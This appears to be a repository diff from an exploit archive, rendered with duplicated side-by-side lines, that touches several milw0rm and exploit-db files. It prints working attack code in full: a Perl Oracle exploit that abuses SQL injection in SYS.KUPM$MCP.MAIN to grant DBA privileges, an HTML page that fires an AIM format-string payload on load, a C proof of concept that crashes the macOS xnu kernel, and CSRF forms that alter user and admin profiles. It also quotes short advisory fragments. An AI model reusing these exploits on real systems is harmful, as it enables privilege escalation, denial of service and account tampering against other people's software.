$dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s}", $opt{u}, $opt{p}) or die; $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s}", $opt{u}, $opt{p}) or die;
} }
my $sqlcmd = "GRANT ALL PRIVILEGE, DBA TO $user"; my $sqlcmd = "GRANT ALL PRIVILEGE, DBA TO $user";
print "[-] Wait...\n"; print "[-] Wait...\n";
$dbh->func( 1000000, 'dbms_output_enable' ); $dbh->func( 1000000, 'dbms_output_enable' );
if ($opt{r}) { if ($opt{r}) {
print "[-] Revoking DBA from $user...\n"; print "[-] Revoking DBA from $user...\n";
$sqlcmd = "REVOKE DBA FROM $user"; $sqlcmd = "REVOKE DBA FROM $user";
$dbh->do( $sqlcmd ); $dbh->do( $sqlcmd );
print "[-] Done!\n"; print "[-] Done!\n";
$dbh->disconnect; $dbh->disconnect;
exit; exit;
} }
print "[-] Creating evil cursor...\n"; print "[-] Creating evil cursor...\n";
my $sth = $dbh->prepare(qq{ my $sth = $dbh->prepare(qq{
DECLARE DECLARE
MYC NUMBER; MYC NUMBER;
BEGIN BEGIN
MYC := DBMS_SQL.OPEN_CURSOR; MYC := DBMS_SQL.OPEN_CURSOR;
DBMS_SQL.PARSE(MYC,'declare pragma autonomous_transaction; begin execute immediate ''$sqlcmd'';commit;end;',0); DBMS_SQL.PARSE(MYC,'declare pragma autonomous_transaction; begin execute immediate ''$sqlcmd'';commit;end;',0);
DBMS_OUTPUT.PUT_LINE('Cursor: '||MYC); DBMS_OUTPUT.PUT_LINE('Cursor: '||MYC);
END; END;
} ); } );
$sth->execute; $sth->execute;
my $cursor = undef; my $cursor = undef;
while (my $line = $dbh->func( 'dbms_output_get' )) { while (my $line = $dbh->func( 'dbms_output_get' )) {
print "$line\n"; print "$line\n";
if ($line =~ /^Cursor: (\d)/) {$cursor = $1;} if ($line =~ /^Cursor: (\d)/) {$cursor = $1;}
} }
$sth->finish; $sth->finish;
print "[-] Go ...(don't worry about errors)!\n"; print "[-] Go ...(don't worry about errors)!\n";
$sth = $dbh->prepare(qq{ $sth = $dbh->prepare(qq{
BEGIN BEGIN
SYS.KUPM\$MCP.MAIN(''' AND 0=dbms_sql.execute($cursor)--',''); SYS.KUPM\$MCP.MAIN(''' AND 0=dbms_sql.execute($cursor)--','');
END; END;
}); });
$sth->execute; $sth->execute;
$sth->finish; $sth->finish;
print "[-] YOU GOT THE POWAH!!\n"; print "[-] YOU GOT THE POWAH!!\n";
$dbh->disconnect; $dbh->disconnect;
exit; exit;
# milw0rm.com [2007-03-27] # milw0rm.com [2007-03-27]

6
platforms/multiple/remote/745.cgi
View file

@ -144,6 +144,6 @@ value="uptime"></td></tr>
<tr><td colspan="3" align="center"><input type="submit" name="" <tr><td colspan="3" align="center"><input type="submit" name=""
value="Gooooooo!"></td></tr> value="Gooooooo!"></td></tr>
</form></table></body></html>~; </form></table></body></html>~;
} }
# milw0rm.com [2005-01-08] # milw0rm.com [2005-01-08]

6
platforms/multiple/remote/746.pl
View file

@ -153,6 +153,6 @@ if ($sock){
} }
} }
} }
} }
# milw0rm.com [2005-01-08] # milw0rm.com [2005-01-08]

1
platforms/multiple/webapps/10821.txt
View file

@ -1,4 +1,3 @@
Application: WingFTP Server 3.2.4 (maybe earlier versions too) Application: WingFTP Server 3.2.4 (maybe earlier versions too)
Link: http://www.wftpserver.com/ Link: http://www.wftpserver.com/
Vulnerability: CSRF Vulnerability: CSRF

42
platforms/osx/dos/3166.html
View file

@ -1,21 +1,21 @@
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html> <html>
<head> <head>
<title>MOAB-20-01-2007</title> <title>MOAB-20-01-2007</title>
<script> <script>
function boom() { function boom() {
var str = ''; var str = '';
for (var i = 0; i < 20; i++) { for (var i = 0; i < 20; i++) {
str = str + escape('A%n'); str = str + escape('A%n');
} }
str = 'aim:gochat?roomname=' + str; str = 'aim:gochat?roomname=' + str;
window.location = str; window.location = str;
} }
</script> </script>
</head> </head>
<body onload="boom()"> <body onload="boom()">
</body> </body>
</html> </html>
# milw0rm.com [2007-01-21] # milw0rm.com [2007-01-21]

146
platforms/osx/dos/8265.c
View file

@ -1,73 +1,73 @@
/* xnu-vfssysctl-dos.c /* xnu-vfssysctl-dos.c
* *
* Copyright (c) 2008 by <mu-b@digit-labs.org> * Copyright (c) 2008 by <mu-b@digit-labs.org>
* *
* Apple MACOS X xnu <= 1228.x local kernel DoS POC * Apple MACOS X xnu <= 1228.x local kernel DoS POC
* by mu-b - Wed 19 Nov 2008 * by mu-b - Wed 19 Nov 2008
* *
* - Tested on: Apple MACOS X 10.5.5 (xnu-1228.8.20~1/RELEASE_I386) * - Tested on: Apple MACOS X 10.5.5 (xnu-1228.8.20~1/RELEASE_I386)
* *
* - Private Source Code -DO NOT DISTRIBUTE - * - Private Source Code -DO NOT DISTRIBUTE -
* http://www.digit-labs.org/ -- Digit-Labs 2008!@$! * http://www.digit-labs.org/ -- Digit-Labs 2008!@$!
*/ */
#include <stdio.h> #include <stdio.h>
#include <stdlib.h> #include <stdlib.h>
#include <hfs/hfs_mount.h> #include <hfs/hfs_mount.h>
#include <pthread.h> #include <pthread.h>
#include <string.h> #include <string.h>
#include <sys/mount.h> #include <sys/mount.h>
#include <sys/types.h> #include <sys/types.h>
#include <sys/sysctl.h> #include <sys/sysctl.h>
#include <unistd.h> #include <unistd.h>
void void
hammer (void *arg) hammer (void *arg)
{ {
char buf[1024 * (255 + 1)]; char buf[1024 * (255 + 1)];
int n, name[6]; int n, name[6];
memset (buf, 0, sizeof buf); memset (buf, 0, sizeof buf);
while (1) while (1)
{ {
name[0] = CTL_VFS; name[0] = CTL_VFS;
name[1] = 17; name[1] = 17;
name[2] = HFS_SET_PKG_EXTENSIONS; name[2] = HFS_SET_PKG_EXTENSIONS;
name[3] = (int) buf; name[3] = (int) buf;
name[4] = 1024; name[4] = 1024;
name[5] = (rand () % 254) + 1; name[5] = (rand () % 254) + 1;
n = sysctl (name, 6, NULL, NULL, NULL, 0); n = sysctl (name, 6, NULL, NULL, NULL, 0);
usleep(10); usleep(10);
} }
} }
int int
main (int argc, char **argv) main (int argc, char **argv)
{ {
int i, n, tid; int i, n, tid;
printf ("Apple MACOS X xnu <= 1228.x local kernel DoS PoC\n" printf ("Apple MACOS X xnu <= 1228.x local kernel DoS PoC\n"
"by: <mu-b@digit-labs.org>\n" "by: <mu-b@digit-labs.org>\n"
"http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n"); "http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n");
for (i = 0; i < 4; i++) for (i = 0; i < 4; i++)
{ {
n = pthread_create (&tid, NULL, hammer, NULL); n = pthread_create (&tid, NULL, hammer, NULL);
if (n < 0) if (n < 0)
{ {
fprintf (stderr, "failed creating hammer thread\n"); fprintf (stderr, "failed creating hammer thread\n");
return (EXIT_FAILURE); return (EXIT_FAILURE);
} }
} }
while (1) while (1)
sleep (1); sleep (1);
/* not reached! */ /* not reached! */
return (EXIT_SUCCESS); return (EXIT_SUCCESS);
} }
// milw0rm.com [2009-03-23] // milw0rm.com [2009-03-23]

11
platforms/osx/local/30096.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/24208/info
Apple Mac OS X's VPN service daemon is prone to a format-string vulnerability because it fails to properly sanitize user-supplied input before passing it as the format specifier to a formatted-printing function.
Attackers may exploit this issue to crash the application or execute arbitrary code with superuser privileges. Successful exploits can result in a complete compromise of vulnerable computers.
Apple Mac OS X Server 10.4.9 and prior versions are vulnerable to this issue.
This issue was originally included in BID 24144 (Apple Mac OS X 2007-005 Multiple Security Vulnerabilities), but has been given its own record.
http://www.exploit-db.com/sploits/30096.tar.gz

4
platforms/php/webapps/10419.txt
View file

@ -45,7 +45,7 @@ This exploit will change this info for every user that opens it and is logged in
<input type='hidden' name='showprofile' value='1'> <input type='hidden' name='showprofile' value='1'>
<input type='hidden' name='avatar' value=''> <input type='hidden' name='avatar' value=''>
<input type='hidden' name='forumtemplate' value='1'> <input type='hidden' name='forumtemplate' value='1'>
<textarea name='signature'>Free your mind and the ass will follow.</textarea> <textarea name='signature'>Free your mind and the ass will follow.&lt;/textarea&gt;
<input type='submit' name='submit' value='change details'> <input type='submit' name='submit' value='change details'>
</form> </form>
@ -66,7 +66,7 @@ Admins must run this exploit.
<input type='text' name='email' value='email@mail.com<mailto:email@mail.com>'> <input type='text' name='email' value='email@mail.com<mailto:email@mail.com>'>
<input type='text' name='rank' value='0'> <input type='text' name='rank' value='0'>
<input type='hidden' name='isbanned' value='No'> <input type='hidden' name='isbanned' value='No'>
<textarea name='sig'>this is my signature</textarea> <textarea name='sig'>this is my signature&lt;/textarea&gt;
<input type='submit' name='submit' value='Edit This user'> <input type='submit' name='submit' value='Edit This user'>
</form> </form>

1
platforms/php/webapps/10555.txt
View file

@ -1,4 +1,3 @@
Pentest Information: Pentest Information:
==================== ====================
GESEC Team (~remove) discover a input validation vulnerability on Barracuda - Web Application Firewall 660 (Appliance). GESEC Team (~remove) discover a input validation vulnerability on Barracuda - Web Application Firewall 660 (Appliance).

1
platforms/php/webapps/10621.txt
View file

@ -1,4 +1,3 @@
|| || | || || || | ||
o_,_7 _|| . _o_7 _|| 4_|_|| o_w_, o_,_7 _|| . _o_7 _|| 4_|_|| o_w_,
( : / (_) / ( . ( : / (_) / ( .

Some files were not shown because too many files have changed in this diff Show more